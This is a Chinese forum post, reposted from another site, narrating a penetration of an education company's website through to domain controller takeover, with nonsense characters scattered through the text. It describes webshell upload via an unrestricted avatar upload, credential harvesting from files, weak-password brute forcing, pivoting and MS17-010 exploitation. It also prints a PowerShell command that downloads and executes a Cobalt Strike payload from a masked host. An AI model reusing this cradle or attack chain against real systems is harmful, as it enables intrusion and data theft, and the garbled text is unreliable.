|
, v# a6 E/ h5 S6 S2 A' {8 f
这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路
) C) R( I- P k6 e" [- a% g0 }
4 @8 j; E" l- X, L
4 q+ i0 ^6 A9 Q. S6 \ , {- p& {7 A( `# T# x! g: B4 q
# t# v$ @) v8 K. N4 P5 a- [3 N* a
& P8 S- K- C' }/ m 正文% J( L! l/ D8 L! Z
( y: Z7 j3 q9 ]9 V& N0 s0 i
) R1 r% u9 Q& t! n' n; z1 \: f * ]' [0 O, B/ b# ^9 Z
8 y" w+ E9 n" m5 c% s$ a" y) f' Y4 L1 l3 |5 A
目标:www.xxxx.com(一家教育机构)
8 Z9 r) q8 [3 V- d6 l, A' t9 O7 `打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能) ]) Q4 }* z2 I( h
3 G# H3 ]0 Q5 s( N
7 T6 e+ ?6 ?9 ^& O1 W/ p- ^1 }$ a+ f
 3 _" X! X# e& I, A z
' X% I# s% A+ d1 e) ]& `7 E1 A# J! R. H1 h! s. `, p
进行了简单的信息搜集
) o& m$ R+ i' K$ t# A
# A% r6 \8 C' k+ t5 k8 r
; x9 S) {, s R8 q1 v8 i2 v; ` ' R4 s2 u! G- L
+ `! |6 u$ i9 G, J$ X" S- D/ `
子域名搜集0 C: @3 E6 S) m+ ]' j
2 Y% T8 b ]- X) T1 p/ l/ C7 v
2 e; ]0 R* N- N' U+ Z& r0 |
 8 \6 b! t1 `' r8 ^6 A L/ M) O
- J! [( Y6 Y0 y9 V/ B8 P! i; q# m2 B$ i1 W5 V, `' ?: t$ O9 ^" `
fofa找资产
/ s% p. s8 [6 U* L5 ^
: d' A' j/ P3 V7 @+ Z9 q+ E
R& {/ n& ]5 \* h. u. u % ]/ i$ T7 B1 y' p4 k9 @
! l. y/ \' n, M1 W! i 
5 x; N6 ?" F+ r; @
( v) {: D7 `7 @& B! ]8 u1 W: C4 j" |* s% P, z9 p ~+ N4 S* I% b1 `
一共七个资产。去重之后只有两个。
6 M2 D6 N4 a0 s& c5 ^
. U9 u2 x( p& ^, M( T1 ^# N* c- Y1 g9 Z3 M
5 u/ o/ ]- D$ _5 {6 D% g
+ Z3 v2 o4 O0 A' D" L+ U+ b 目录探测
2 l c; m0 k3 A; {1 @
. x5 ?/ u3 P6 i" E# y' O+ T" K0 e0 [ o$ P; X
) G3 K! t$ M1 o1 I5 U
# Z- h* K0 y# {2 ^" O. Z9 K) h3 ~: t) B2 s$ ]: x
我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
; B5 z4 B' _/ w: H* p/ v. x) \
0 t9 f5 p/ n6 `6 a
3 A% ]; s' W8 m" y2 R, Y, c7 w* U
/ ]- H* b W/ l0 e$ h5 ^$ |
S% \! ]3 j0 E) }4 o3 f, o
我又尝试了通过修改返回包来绕过登录界面/ ~; Z; \$ b+ x! l2 z% C5 i
& N& l5 q: l% R1 V8 A# A
4 t# t a- u! M) z  9 H. N5 `6 M+ T/ E. O8 u
6 f- `5 g) A; n; M
: J+ c) f C+ e, Z; _( O( ~
还是不行,尝试注入无果6 j4 @- o6 p; ?8 ^/ B7 m% g- ^6 M
* q4 g4 m# h/ Y1 Q* w4 a/ y0 L5 `1 S% `
( i" i7 F7 v5 D
9 E3 }/ F$ E! ~4 w5 e2 |* D# K+ X+ e6 c4 W. k
不过我目录探测出了一处Spring信息泄露
: D7 `8 d7 c6 T: [- p
( K% f( y2 k0 L/ G- i- d& E" O
7 q" {' u4 x1 Z
) l) i1 [8 c8 s9 ?* V% {: L9 n9 [6 m
 ! E' P( G5 T. @7 H
9 D: D2 e# ]' |: z" Q
. t8 Q7 ^7 M- g2 d" ~$ h7 I/ N 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录
N* [# c$ J7 S9 s: _1 | : r) K2 P2 H! f5 i/ I6 w D6 E
+ t. o: Y0 h2 M8 ?) _0 o0 r4 P 
) a8 g: [5 Z4 A6 Q
. X" U. n8 C [( v& j" n
" t" E. d) v6 F4 Z5 }% t 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。
; |0 v: T) i4 R3 y7 D; [& r ? / L% s2 M8 B1 P! [
2 C$ b9 v) W/ g& F) T; V q+ W  7 X, v9 S. H$ o; [: ]2 @! w: N
- Z3 J6 w7 O2 D- w7 d! p
% V2 N. K2 {- v# r0 z! e9 [7 z 获取有些师傅到这一步就手机抓包电脑测了。9 S; r& |; V- j) `+ W. ]1 f
/ W. ]3 l% U- A8 F$ B2 v
7 w& L( _/ X) h& }3 @% s Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。
. Q* A$ j. r) R# ~
% I, [/ B( h7 F' M; Z: `
! M' I* R5 S1 [: M4 `$ C 其中在一个公众号发现了小程序,可以进行注册。( F1 b/ j/ ~, B+ P- ]
" l, z' ?+ d7 r. l- S
3 |: y$ l$ D6 f- x% T7 D2 Z9 y 看到了头像上传,尝试上传获取WebShell
9 I& L* r0 o; {# p6 J$ H5 h( u+ a
5 R$ Q9 Z6 i% m {1 G/ W
z" c' @1 Z3 z* A/ O& f ~2 w 
/ m/ p# A; {5 Z
% S- n" _7 C: S. p7 L- \* C6 J& e3 f4 T
未做任何限制成功GetShell,上了冰蝎马,目录没权限访问5 N% o, \/ ]) `$ V& m
8 M) K0 h( @5 c' i' X# Z
% v$ Y( s Q* P  1 \7 {9 X: _0 w: q: i1 D6 I
2 u8 F& w$ k& L7 H: ]4 B1 |- p/ O- n& _, ]5 o/ E
然后上了大马9 C* V5 X. r/ P* D* v
z' p6 h0 I7 {: ?% P/ R9 G! V, a
7 f" j2 D) u. e& M: ]  6 R, P) P( I5 `5 T! {
) I2 p, z: S7 v0 u- a
, p1 a9 L1 p. t5 y$ ]. Y, } 
0 M: y8 J4 Q( p% z- G3 H) \$ A& c 2 R9 ^; C1 F6 G6 x
$ a# T6 s4 r6 h( R; |1 }+ A$ z 通过翻找文件发现数据库账号密码* W0 D; F# L+ i2 T. i# C; x
0 P" v( k! Y; l( L) |
+ i( T) Q+ i1 |$ R( ]( ]
 {) W& P! U7 w' \$ z6 z, s
" |1 [- T9 a* D `. F8 a0 T6 ]: D. k
& t) X; L7 z5 s, a2 S8 W+ y- G --内网渗透
: y$ S( S! T L) f1 w ) U7 a+ F1 ~% y5 q4 j/ J d F
1 z% b. x6 W; V9 K 直接通过powershell执行 cs上线" Z. [+ C5 ?) u5 S
, R& k* ?5 I4 v, J) {2 C" W
' c- u! d6 l" Z5 U1 |1 [
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"$ h; q% J f. I
9 a) y+ O% r2 q6 g- g3 u
+ R& G0 T- F( y$ e- b0 x, B 
0 o9 q$ _" n; \2 E6 G8 R6 t) U
! Q+ Z& c4 i G3 x3 x. G1 r" i
: s' ]: x) `( M- I' b$ J7 e 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破+ Y; o8 A3 ?9 v: S3 b
- X) ^ [, S2 w9 ]( G/ h
8 e: J7 ?+ p3 T' s  $ \, a2 t4 d! q; A
$ a% F5 ]& {) ?. G
1 \$ p+ F- k$ Z: h0 l+ M( | 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
( D3 `' z ?' F% }; l: R
* Z2 ^$ O! L% S% G
; E+ i8 E% ~" G: a7 Q: O! U8 t$ ]/ ^
7 u8 ?' W1 r3 ]1 l* ^' t. [8 J3 e
2 A1 X j* Y% }: ~7 ^; Z
 ( d- ]3 p! m" K! A- a
; w. L8 ?4 z# B% M- b- i! u* ^% c! r6 d1 x9 K
通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
# W8 s4 W0 e" G; l# u" H
; f5 T4 a9 Z1 |
: e) c1 u( C+ c1 @6 P$ d% Z- ~
! x; _ U* I& B0 v
: ~# b" l: Y8 @+ S$ b8 `0 e  : u+ y/ O: O1 r) a( y
! t( u. U/ k* M/ H% d. K9 T+ p! I. o$ O
4 q( o% C' v7 w! l
- } ^! X2 [# A
8 l1 |& ^8 N B2 T
$ @; m, j6 ?" ]" m# U" ?7 `5 C0 m
: [, y# [- Q# O+ y; H" h' `* G) x" F. t K0 g- r& v i# Z* p7 m
' I5 K0 O$ M1 ~
3 n) Q0 e8 l4 A. G: d7 `+ o n
小结
: C) ~6 i' J# Q- t" X! e ' F; g# j8 X& J
( _5 d- [! G1 \. Y& u3 x + Y2 d; Q3 s- x5 y. O" k* Q
/ r* A3 b* q; G
8 y/ V1 f+ }9 q. [6 |
在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!2 Z! |0 N% {' {4 i% l
, Q. [% @0 }. s; {! c1 a$ `! W
4 a Y# V' g& K* G) o
7 T2 s# s, c% c' V
+ |+ n. Z( q0 c% F" K# z% W
" a4 p1 n6 |6 z8 A - ) u# C2 B3 J9 G1 _/ }
7 \7 k0 W- ]3 Q+ a X1 f+ O4 f# }
9 e S" Y% T* Y5 F& t -
1 \3 Y' V6 W& Y
2 C3 B+ g% H/ @1 h7 k
# ]- a; ~" A' K5 v
& d4 |0 n2 p+ I4 C2 k' w+ h! i
+ {! B h! ]- L3 C `5 W6 ?& N 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html* i! U% d/ N" Y& ^
Q, M. Y2 s5 E; B4 k+ ?
& v2 f% p0 U5 A& O5 b# m: e% _ * ^' Q0 V/ N8 R/ a! |0 H+ Y$ u
| 
发表于 2024-3-1 19:41:32
收藏
支持
反对